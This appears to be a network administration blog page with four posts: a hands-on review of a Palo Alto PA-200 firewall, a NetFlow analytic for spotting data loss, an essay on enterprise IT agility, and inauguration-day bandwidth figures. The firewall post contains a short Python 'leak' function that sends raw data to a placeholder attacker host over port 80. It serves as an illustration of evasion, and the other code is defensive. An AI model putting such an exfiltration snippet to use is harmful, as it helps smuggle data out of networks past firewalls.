Web Admin Blog
Real Web Admins. Real World Experience.

2 Jun 2014

My First Experiences with a Palo Alto Firewall

I've been following Palo Alto as a networking company for a couple of years now. Their claim is that the days of the port-based firewall are dead and that their application-centric approach is a far better way to enforce your access controls. Take the HTTP protocol, for example. HTTP typically runs as a service on port 80, but does that mean that everything running on port 80 is HTTP? As an attacker looking for a way to funnel data out of your organization, why not use the standard HTTP port to send it, since I know you leave that port wide open so your employees can surf the web? There's nothing that says I actually have to be running an HTTP server on the other end, and there's nothing in a classic port-based firewall that can tell the difference. At first, I was admittedly a bit skeptical. I didn't think that you could really tell enough about different applications on the web to be able to separate them out the way Palo Alto claims to. Fortunately, Palo Alto reached out to me and provided me with a brand new PA-200 in an attempt to change my mind.
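To make that concrete, here's a minimal Python sketch of the attacker's side of that argument. The host name is a placeholder and nothing here is specific to Palo Alto; it just illustrates that "outbound TCP to port 80" and "HTTP" are not the same thing.

```python
# A minimal sketch of the point above, assuming a hypothetical endpoint.
# A port-based rule that allows outbound TCP/80 says nothing about what
# actually crosses the wire; this sends raw, non-HTTP bytes over "the HTTP port".
import socket

EXFIL_HOST = "attacker.example.com"   # placeholder, not a real server
EXFIL_PORT = 80                       # the standard HTTP port, but no HTTP involved

def leak(data: bytes) -> None:
    """Push raw bytes out over TCP/80 -- no request line, no headers, no HTTP."""
    with socket.create_connection((EXFIL_HOST, EXFIL_PORT), timeout=5) as conn:
        conn.sendall(data)

# A classic firewall sees only "outbound TCP to port 80" and permits it.
# An application-aware firewall can classify the payload and notice it isn't HTTP.
```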

When the PA-200 arrived, it came with everything that I would need to get it up and running. That includes the unit itself, a power supply, a DB9-to-RJ45 console cable, an ethernet cable, and some instructions and warranty information.


On the front of the unit are four ethernet ports for your devices, a management port, a USB port, a console port, and several status indicator LEDs.


By default, the appliance comes with ethernet ports 1 and 2 paired as a WAN-to-LAN link, since that is the configuration the majority of people who buy it will likely use. That said, by following the instructions to connect your computer to the management port, you can quickly access the user interface that allows you to change this assignment.

[Screenshot: Ethernet Configuration]

This shows the ethernet 1 and 2 interfaces both configured as a "virtual wire," and here we can see the virtual wire that connects the two.

[Screenshot: Virtual Wire]

From here, we can take a look at the "zones" and see that our two interfaces have been defined as an untrusted (ethernet 1) and trusted (ethernet 2) zone.

[Screenshot: Zones]

To think of this a different way, my cable modem WAN connection (i.e. the Internet) goes in my "untrust" zone and my local network (i.e. LAN) goes in my "trust" zone. All that's left is to set our policy; for ease of management to start with, I set it to allow everything outbound with a default deny on everything inbound.

[Screenshot: Security Profile]
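For what it's worth, here's a rough sketch (plain Python, not PAN-OS syntax) of how that starting policy behaves: rules are evaluated top down, the first match wins, traffic from trust to untrust is allowed, and everything else falls through to a deny. The rule names and structure are made up for illustration.

```python
# A rough sketch (plain Python, not PAN-OS syntax) of how the starting policy
# behaves: first match wins, trust-to-untrust is allowed, everything else is denied.
from dataclasses import dataclass

@dataclass
class Rule:
    name: str
    from_zone: str   # "any" matches every zone
    to_zone: str
    action: str      # "allow" or "deny"

POLICY = [
    Rule("outbound-any", from_zone="trust", to_zone="untrust", action="allow"),
    Rule("default-deny", from_zone="any",   to_zone="any",     action="deny"),
]

def evaluate(from_zone: str, to_zone: str) -> str:
    """Return the action of the first rule that matches, top to bottom."""
    for rule in POLICY:
        if rule.from_zone in ("any", from_zone) and rule.to_zone in ("any", to_zone):
            return rule.action
    return "deny"  # implicit deny if nothing matches

print(evaluate("trust", "untrust"))   # allow -- LAN out to the Internet
print(evaluate("untrust", "trust"))   # deny  -- unsolicited inbound traffic
```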

With this configuration, I had done enough to be up and running on the device, and I immediately started to see the dashboard populate with the top applications running on my network.

[Screenshot: Top Applications]

It's color-coded based on risk level, and the dashboard also provides a similar view of Top High Risk Applications. Any of these boxes can be clicked on to bring up additional data about the protocol, sources, destinations, countries, and more.

[Screenshot: Application Information]

Now, let me say that while I'm running this on my home internet connection, this thing is a hoss and can do way more than I can throw at it. With their App-ID technology enabled, it can handle 100 Mbps of throughput, no problem. In addition to being an application firewall, it also does standard port-based firewalling, VPN, routing, switching, and so much more. It's so versatile that it could easily be placed in a smaller branch office and replace multiple other devices on the network, such as a firewall, router, and VPN concentrator. More functionality for less money...who wouldn't want that? Beyond these default capabilities, additional licensing can be obtained to add URL filtering, malware detection, and more. Having just gotten it up and running, I'm still exploring the ins and outs of all of the functionality, but it's pretty exciting to have all of this capability in a box that is smaller than the cable modem my ISP provides me. More posts to come as I get deeper into the guts of running my new Palo Alto PA-200!

8 May 2014

Analyzing NetFlow for Data Loss Detection

The 2014 Verizon Data Breach Investigation Report (DBIR) is out and it paints quite the gloomy picture of the world we live in today where cyber security is concerned.  With over 63,000 security incidents and 1,367 confirmed data breaches, the question is no longer if you get popped, but rather, when.  According to the report, data export is second only to credit card theft on the list of threat actions as a result of a breach.  And with the time to compromise typically measured in days and time to discovery measured in weeks or months, Houston, we have a problem.

I've written in the past about all of the cool tricks we've been doing to find malware and other security issues by performing NetFlow analysis using the 21CT LYNXeon tool and this time I've found another trick around data loss detection that I thought was worth writing about.  Before I get into the trick, let's quickly recap NetFlow for those who aren't familiar with it.

Think of NetFlow as the Cliff's Notes of all of the network traffic that your systems handle on a daily basis. Instead of seeing WHAT data was transmitted (a task for deep packet inspection/DPI), we see a summary of HOW the data was transmitted: things like source and destination IP, source and destination port, protocol, and bytes sent and received. Because many network devices are capable of giving you this information for free, it only makes sense to capture it and start using it for security analytics.
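If it helps to see that spelled out, here's roughly what a single flow record boils down to. The field names are my own shorthand, not any particular exporter's schema.

```python
# Roughly what a single flow record boils down to; field names are my own
# shorthand, not any particular exporter's schema.
from dataclasses import dataclass

@dataclass
class FlowRecord:
    src_ip: str        # who sent the traffic
    dst_ip: str        # who received it
    src_port: int
    dst_port: int
    protocol: str      # "TCP", "UDP", ...
    bytes_sent: int    # how much went out -- but never what it actually was
    bytes_received: int

example = FlowRecord("10.0.0.15", "203.0.113.80", 49152, 443, "TCP", 18_200, 512_000)
```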

So, now that we have our NetFlow and we know that we're going to be breached eventually, the real question becomes how to detect it quickly and remediate before a significant data loss occurs. Our LYNXeon tool allows us to create patterns of what to look for within NetFlow and other data sources. So, to help detect data loss, I've designed the following analytic:

[Screenshot: LYNXeon Analytics for Data Loss]

This analytic searches our NetFlow for any time an internal IP address is talking to an external IP address. Then, it adds up the bytes sent for each unique set of connections (same source, destination, and port) and presents me with a top 25 list. Something like this:

[Screenshot: Top 25 List]

So, now we have a list of the top 25 source and destination pairs that are sending data outside of our organization. There are also some interesting ports in this list, like 12547, 22 (SSH), 443 (HTTPS), and 29234. A system with 38.48 GB worth of data sent to a remote server seems like a bad sign and something that should be investigated. You get the idea. It's just a matter of analyzing the data, separating out what is typical from what isn't, and then digging deeper into the outliers.
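The LYNXeon pattern itself is point-and-click, but if you wanted to approximate the same analytic over a raw flow export, it boils down to a filter, a group-by, and a sort. This sketch assumes a hypothetical CSV export with the column names shown; adjust to whatever your collector actually produces.

```python
# Approximating the analytic over a raw flow export: keep internal-to-external
# flows, sum bytes sent per (source, destination, port), and print the top 25.
# The CSV file and column names below are hypothetical.
import csv
import ipaddress
from collections import defaultdict

INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)

totals = defaultdict(int)  # (src_ip, dst_ip, dst_port) -> total bytes sent out

with open("netflow_export.csv", newline="") as fh:              # hypothetical export
    for row in csv.DictReader(fh):
        src, dst = row["src_ip"], row["dst_ip"]
        if is_internal(src) and not is_internal(dst):           # internal talking to external
            totals[(src, dst, int(row["dst_port"]))] += int(row["bytes_sent"])

# Top 25 candidates for a closer look, largest senders first.
top25 = sorted(totals.items(), key=lambda kv: kv[1], reverse=True)[:25]
for (src, dst, port), sent in top25:
    print(f"{src:>15} -> {dst:>15} :{port:<5} {sent / 1e9:8.2f} GB")
```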

My advice is to run this report on an automated schedule at least daily so that you can quickly detect when data loss has begun and squash it at the source. You could probably argue that an attacker might take a low and slow approach to remain undetected by my report, and you'd probably be right, but I'd also argue that if this were the case, then I've hopefully slowed them down enough to catch them another way within a reasonable timespan. Remember, security is all about defense in depth, and with the many significant issues highlighted by the Verizon DBIR, we could use all of the defense we can muster.

9 Feb 2010

Enterprise Systems vs. Agility

I was recently reading a good Cameron Purdy post where he talks about his eight theses regarding why startups or students can pull stuff off that large enterprise IT shops can't.

My summary/trenchant restatement of his points:

  1. Changing existing systems is harder than making a custom-built new one (version 2 is harder)
  2. IT veterans overcomplicate new systems
  3. The complexity of a system increases exponentially the work needed to change it (versions 3 and 4 are way way harder)
  4. Students/startups do fail a lot, you just don't see those
  5. Risk management steps add friction
  6. Organizational overhead (paperwork/meetings) adds friction
  7. Only overconservative goons work in enterprise IT anyway
  8. The larger the org, the more conflict

Though I suspect #1 and #3 are the same, #2 and #5 are the same, and #6 and #8 are the same, really.

I've been thinking about this lately with my change from our enterprise IT Web site to a new greenfield cloud-hosted SaaS product in our R&D organization.  It's definitely a huge breath of fresh air to be able to move fast.  My observations:

Complexity

The problem of systems complexity (theses #1 and #3) is a very real one.  I used to describe our Web site as having reached "system gridlock."  There were hundreds of apps running dozens to a server with poorly documented dependencies on all kinds of stuff.  You would go in and find something that looked "wrong" - an Apache config, script, load balancer rule, whatever - but if you touched it some house of cards somewhere would come tumbling down.  Since every app developer was allowed to design their own app in its own tightly coupled way, we had to implement draconian change control and release processes in an attempt to stem the tide of people lining up to crash the Web site.

We have a new system design philosophy for our new gig which I refer to as "sharing is the devil."  All components are separated and loosely coupled.  Using cloud computing for hardware and open source for software makes it easy and affordable to have a box that does "only one thing."  In traditional compute environments there's pressure to "use up all that CPU before you add more", which results in a penny wise, pound foolish strategy of consolidation.  More and more apps and functions get crunched closer together and when you go back to pull them out you discover that all kinds of new connections and dependencies have formed unbidden.

Complication

Overcomplicating systems (#2 and #5) can be somewhat overcome by using agile principles.  We've been delving heavily into doing not just our apps but also our infrastructure according to an agile methodology.  It surfaces your requirements - frankly, systems people often get away with implementing whatever they want, without having a spec, let alone one open to review.  It also makes you prioritize: "Whatever you can get done in this two-week iteration, that's what you'll have done, and it should be working."  It forces focus on what is required to get things working and defers the more complex niceties until later, as there's time.

Conservatism

Both small and large organizations can suffer from #6 and #8.  That's mostly a mindset issue.  I like to tell the story about how we were working on a high level joint IT/business vision for our Web site.  We identified a number of "pillars" of the strategy we were developing - performance, availability, TCO, etc.  I had identified agility as one, but one of the application directors just wasn't buying into it.  "Agility, that's weird, how do we measure that, we should just forget about it."  I finally had to take all the things we had to the business head of the Web and say "of these, which would you say is the single most important one?"  "Agility, of course," he said, as I knew he would.  I made it a point to train my staff that "getting it done" was the most important thing, more important than risk mitigation or crossing all the t's and dotting all the i's.  That can be difficult if the larger organization doesn't reward risk and achievement over conservatism, but you can work on it.

21 Jan 2009

A DoS We Can Believe In

We knew that the historic inauguration of Barack Obama would be generating a lot more Internet traffic than usual, both in general and specifically here at NI.  Being prudent Web Admin types, we checked around to make sure we thought that there wouldn't be any untoward effects on our Web site.  Like many corporate sites, we use the same pipe for inbound Internet client usage and outbound Web traffic, so employees streaming video to watch the event could pose a problem.  We got all thumbs up after consulting with our networking team, and decided not to even send out any messaging asking people to avoid streaming.  But we monitored the situation carefully as the day unfolded.  Here's what we saw, just for your edification!

Our max inbound Internet throughput was 285 Mbps, about double our usual peak.  We saw a ni.com Web site performance degradation of about 25% for less than two hours, according to our Keynote stats.  ni.com ASPs were affected proportionately, which indicates the slowdown was Internet-wide and not unique to our specific Internet connection here in Austin.  The slowdown was less pronounced internationally, but still visible.  So in summary - not a global holocaust, but a noticeable bump.

Cacti graphs showing our Internet connection traffic:

[Cacti graphs: hourly and daily Internet connection traffic]

Keynote graph of several of our Web assets, showing global response time in seconds:

[Keynote graph: global response time]

Looking at the traffic specifically, there were two main standouts.  We had TCP 1935, which is Flash RTMP, peaking around 85 Mbps, and UDP 8247, which is a special CNN port (they use a plugin called "Octoshape" with their Flash streaming), peaking at 50 Mbps.  We have an overall presence of about 2,500 people here at our Austin HQ on an average day, but we can't tell exactly how many were streaming.  (Our NetQoS setup shows us there were 13,600 "flows," but every time a stream stops and starts, that creates a new one - and the streams were hiccupping like crazy.  We'd have to do a bunch of Excel work to figure out max concurrent, and we have better things to do.)
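(For the curious, the Excel work we skipped would amount to a simple sweep over flow start and end times. Here's a rough Python sketch against a hypothetical flow export; the file and column names are made up, and restarted streams would still inflate the count.)

```python
# The "Excel work" we skipped: max concurrent flows is a simple sweep over
# flow start/end times. The file and column names are hypothetical, and
# restarted streams would still inflate the flow count.
import csv
from datetime import datetime

events = []  # (timestamp, +1 at flow start / -1 at flow end)

with open("inauguration_flows.csv", newline="") as fh:   # hypothetical NetQoS export
    for row in csv.DictReader(fh):
        events.append((datetime.fromisoformat(row["start_time"]), +1))
        events.append((datetime.fromisoformat(row["end_time"]), -1))

concurrent = peak = 0
for _, delta in sorted(events):   # ends sort before starts at the same instant
    concurrent += delta
    peak = max(peak, concurrent)

print(f"Max concurrent flows: {peak}")
```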

In terms of the streaming provider breakdown - since everyone uses Akamai now, the vast majority showed as "Akamai".  We could probably dig more to find out, but we don't really care all that much.  And, many of the sources were overwhelmed, which helped some.

We just wanted to share the data, in case anyone finds it helpful or interesting.